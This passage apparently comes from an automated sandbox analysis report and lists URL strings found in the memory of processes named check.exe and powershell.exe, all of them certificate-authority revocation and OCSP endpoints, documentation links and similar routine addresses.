Source: check.exe, 00000004.00000003.2323887657.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2324102716.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2303863332.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2305782270.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2323533147.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2309399741.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2327986930.0000019B963A5000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2295709781.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2324743925.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2324940975.0000019B963B1000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2326098634.0000019B963A5000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2304532091.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2323993737.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2323316314.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2325441662.0000019B963A5000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2324248237.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2328247501.0000019B963B2000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2301672033.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2324494558.0000019B963B1000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2306706230.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2324940975.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: check.exe, 00000004.00000003.2680794042.0000019B963B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: check.exe, 00000005.00000002.2581028850.000001835534C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://code.activestate.com/recipes/577452-a-memoize-decorator-for-instance-methods/
Source: check.exe, 00000005.00000002.2581028850.0000018355695000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2415314317.0000018355695000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.certigna.fr/certignarootca.crl01
Source: check.exe, 00000005.00000002.2581028850.000001835534C000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2578829374.0000018353119000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: check.exe, 00000005.00000003.2417169595.0000018355613000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2581028850.0000018355612000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2581028850.00000183554FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/COMODOCertificationAuthority.crl
Source: check.exe, 00000005.00000003.2417169595.0000018355613000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2581028850.0000018355612000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/COMODOCertificationAuthority.crlU
Source: check.exe, 00000005.00000002.2581028850.0000018355695000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2415314317.0000018355695000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.dhimyotis.com/certignarootca.crl
Source: check.exe, 00000005.00000002.2581028850.0000018355695000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2415314317.0000018355695000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.dhimyotis.com/certignarootca.crlU4
Source: check.exe, 00000005.00000003.2417169595.0000018355613000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2581028850.0000018355612000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.securetrust.com/SGCA.crl
Source: check.exe, 00000005.00000003.2415314317.00000183555DD000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2581028850.00000183555DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.securetrust.com/STCA.crl
Source: check.exe, 00000005.00000003.2415314317.00000183555DD000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2581028850.00000183555DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl
Source: check.exe, 00000005.00000002.2581028850.000001835534C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
Source: check.exe, 00000004.00000003.2680794042.0000019B963B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: check.exe, 00000004.00000003.2323887657.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2324102716.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2303863332.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2305782270.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2323533147.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2309399741.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2327986930.0000019B963A5000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2295709781.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2324743925.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2326098634.0000019B963A5000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2304532091.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2323993737.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2323316314.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2325441662.0000019B963A5000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2309399741.0000019B963B1000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2324248237.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2301672033.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2306706230.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2324940975.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2298478851.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2305554575.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: check.exe, 00000004.00000003.2323887657.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2324102716.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2303863332.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2305782270.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2323533147.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2309399741.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2327986930.0000019B963A5000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2295709781.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2324743925.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2324940975.0000019B963B1000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2326098634.0000019B963A5000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2304532091.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2323993737.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2323316314.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2325441662.0000019B963A5000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2324248237.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2328247501.0000019B963B2000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2301672033.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2324494558.0000019B963B1000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2306706230.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2324940975.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: check.exe, 00000004.00000003.2680794042.0000019B963B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: check.exe, 00000004.00000003.2323887657.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2324102716.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2303863332.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2305782270.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2323533147.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2309399741.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2327986930.0000019B963A5000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2295709781.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2324743925.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2326098634.0000019B963A5000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2304532091.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2323993737.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2323316314.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2325441662.0000019B963A5000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2309399741.0000019B963B1000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2324248237.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2301672033.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2306706230.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2324940975.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2298478851.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2305554575.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: check.exe, 00000004.00000003.2325096078.0000019B963A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl
Source: check.exe, 00000004.00000003.2323887657.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2324102716.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2303863332.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2305782270.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2323533147.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2309399741.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2327986930.0000019B963A5000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2295709781.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2324743925.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2324940975.0000019B963B1000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2326098634.0000019B963A5000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2304532091.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2323993737.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2323316314.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2325441662.0000019B963A5000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2324248237.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2328247501.0000019B963B2000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2301672033.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2324494558.0000019B963B1000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2306706230.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2324940975.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: check.exe, 00000004.00000003.2323887657.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2324102716.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2303863332.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2305782270.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2323533147.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2309399741.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2327986930.0000019B963A5000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2295709781.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2324743925.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2324940975.0000019B963B1000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2326098634.0000019B963A5000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2304532091.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2323993737.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2323316314.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2325441662.0000019B963A5000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2309399741.0000019B963B1000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2324248237.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2328247501.0000019B963B2000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2301672033.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2324494558.0000019B963B1000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2306706230.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: check.exe, 00000004.00000003.2323887657.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2324102716.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2303863332.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2305782270.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2323533147.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2309399741.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2327986930.0000019B963A5000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2295709781.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2324743925.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2326098634.0000019B963A5000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2304532091.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2323993737.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2323316314.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2325441662.0000019B963A5000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2309399741.0000019B963B1000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2324248237.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2301672033.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2306706230.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2324940975.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2298478851.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2305554575.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: check.exe, 00000004.00000003.2323887657.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2324102716.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2303863332.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2305782270.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2323533147.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2309399741.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2327986930.0000019B963A5000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2295709781.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2324743925.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2324940975.0000019B963B1000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2326098634.0000019B963A5000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2304532091.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2323993737.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2323316314.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2325441662.0000019B963A5000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2324248237.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2328247501.0000019B963B2000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2301672033.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2324494558.0000019B963B1000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2306706230.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2324940975.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: check.exe, 00000005.00000003.2375078159.00000183555F7000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2585634038.0000018355A70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://curl.haxx.se/rfc/cookie_spec.html
Source: check.exe, 00000005.00000002.2586615766.0000018355C60000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://goo.gl/zeJZl.
Source: check.exe, 00000005.00000003.2409464114.0000018355052000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2375173777.0000018355052000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2580123752.0000018355052000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://google.com/
Source: check.exe, 00000005.00000002.2580123752.0000018354F8E000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2409464114.0000018354F93000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2375173777.0000018354F93000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://google.com/mail/
Source: check.exe, 00000005.00000002.2581028850.000001835534C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535
Source: check.exe, 00000005.00000002.2585634038.0000018355A70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://mail.python.org/pipermail/python-dev/2012-June/120787.html.
Source: check.exe, 00000005.00000003.2417169595.0000018355613000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2581028850.0000018355612000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.accv.es
Source: check.exe, 00000005.00000003.2417169595.0000018355613000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2581028850.0000018355612000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.accv.es0
Source: check.exe, 00000005.00000003.2417169595.0000018355613000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2581028850.0000018355612000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.accv.esiE
Source: check.exe, 00000004.00000003.2680794042.0000019B963B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: check.exe, 00000004.00000003.2323887657.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2324102716.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2303863332.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2305782270.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2323533147.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2309399741.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2327986930.0000019B963A5000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2295709781.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2324743925.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2324940975.0000019B963B1000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2326098634.0000019B963A5000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2304532091.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2323993737.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2323316314.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2325441662.0000019B963A5000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2309399741.0000019B963B1000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2324248237.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2328247501.0000019B963B2000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2301672033.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2324494558.0000019B963B1000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2306706230.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: check.exe, 00000004.00000003.2323887657.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2324102716.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2303863332.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2305782270.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2323533147.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2309399741.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2327986930.0000019B963A5000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2295709781.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2324743925.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2326098634.0000019B963A5000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2304532091.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2323993737.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2323316314.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2325441662.0000019B963A5000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2309399741.0000019B963B1000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2324248237.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2301672033.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2306706230.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2324940975.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2298478851.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2305554575.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0N
Source: check.exe, 00000004.00000003.2323887657.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2324102716.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2303863332.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2305782270.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2323533147.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2309399741.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2327986930.0000019B963A5000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2295709781.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2324743925.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2324940975.0000019B963B1000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2326098634.0000019B963A5000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2304532091.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2323993737.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2323316314.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2325441662.0000019B963A5000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2324248237.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2328247501.0000019B963B2000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2301672033.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2324494558.0000019B963B1000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2306706230.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2324940975.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0O
Source: powershell.exe, 00000000.00000002.2345627693.000002C4AD916000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: check.exe, 00000005.00000002.2581028850.0000018355588000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2581028850.0000018355541000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2417169595.0000018355613000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2581028850.0000018355612000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2415314317.0000018355556000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://repository.swisssign.com/
